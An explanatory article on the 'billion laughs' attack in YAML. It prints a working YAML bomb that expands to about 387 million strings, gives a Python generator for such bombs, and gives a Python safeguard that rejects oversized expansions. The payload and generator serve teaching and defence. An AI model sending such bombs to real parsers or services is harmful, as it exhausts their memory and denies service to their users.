Billion laughs attack (YAML Bomb)



In the classic example, the attack defines 10 entities, each consisting of 10 copies of the previous one. The document itself contains a single instance of the largest entity, which expands to one billion copies of the first entity.

A “billion laughs” attack is possible in any file format that can contain references.

For example, this YAML bomb:

a: &a ["lol","lol","lol","lol","lol","lol","lol","lol","lol"]
b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a]
c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b]
d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c]
e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d]
f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e]
g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f]
h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g]
i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]

When a YAML parser loads this document, “i” appears to contain just nine references to “h”. However, each alias “*h” refers to the list anchored as “&h”, which in turn contains nine “*g” aliases, and so on down to “&a”, a list of nine “lol” strings. Once every alias has been expanded, this small (< 1 KB) block of YAML contains 9^9 = 387,420,489 “lol”s. With ten entries per level, as in the example attack described above, the total reaches 10^9 = one billion “lol”s, taking up almost 3 GB of memory.
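The growth can be checked without loading the document into a parser. The following is a minimal sketch that regenerates the text of the bomb and computes how many strings a full expansion would produce. The function names `build_yaml_bomb` and `expanded_count` and their parameters are made up for this illustration and do not belong to any YAML library.

```python
import string


def build_yaml_bomb(fanout: int = 9, levels: int = 9) -> str:
    """Return YAML text with `levels` anchored lists, each repeating the previous one `fanout` times."""
    names = string.ascii_lowercase[:levels]
    lines = []
    for index, name in enumerate(names):
        if index == 0:
            # The first list holds the literal payload strings.
            items = ['"lol"'] * fanout
        else:
            # Every later list holds aliases to the list defined just before it.
            items = ["*" + names[index - 1]] * fanout
        lines.append(f"{name}: &{name} [{','.join(items)}]")
    return "\n".join(lines) + "\n"


def expanded_count(fanout: int = 9, levels: int = 9) -> int:
    """Number of payload strings once every alias is replaced by a full copy."""
    return fanout ** levels


bomb = build_yaml_bomb()
print(len(bomb.encode("utf-8")), "bytes of YAML text")
print(expanded_count(), "payload strings after full expansion")
```

The text grows linearly with the number of levels, while the expanded size grows exponentially, which is what makes the attack cheap for the sender and expensive for the receiver.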


For this reason, file formats that do not allow references are often preferred for data arriving from untrusted sources.
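Where a format with references cannot be avoided, one possible safeguard is to measure how large the data would become if fully expanded, and to reject it above a limit. The sketch below assumes the parser has already resolved references into shared Python lists or dictionaries rather than copies. The function `expanded_size` and its `budget` parameter are hypothetical names chosen for this illustration, not part of any parser's API.

```python
_IN_PROGRESS = object()  # marker for containers currently being measured


def expanded_size(node, budget, _cache=None):
    """Count the leaves `node` would have if every shared reference were copied.

    Raises ValueError as soon as the count exceeds `budget`, or if the
    structure refers back to itself.
    """
    if _cache is None:
        _cache = {}
    if not isinstance(node, (list, dict)):
        return 1  # a scalar counts as one leaf
    key = id(node)
    if key in _cache:
        if _cache[key] is _IN_PROGRESS:
            raise ValueError("self-referencing structure")
        return _cache[key]  # shared container: reuse the earlier result
    _cache[key] = _IN_PROGRESS
    children = node.values() if isinstance(node, dict) else node
    total = 0
    for child in children:
        total += expanded_size(child, budget, _cache)
        if total > budget:
            raise ValueError("expanded size exceeds budget")
    _cache[key] = total
    return total


# Build the same shape as the YAML bomb using shared references:
# nine levels, each list pointing nine times at the level below.
bomb = ["lol"] * 9
for _ in range(8):
    bomb = [bomb] * 9

try:
    expanded_size(bomb, budget=1_000_000)
except ValueError as error:
    print("rejected:", error)
```

Because each shared container is measured only once, the check itself takes time proportional to the size of the compact structure, not the expanded one.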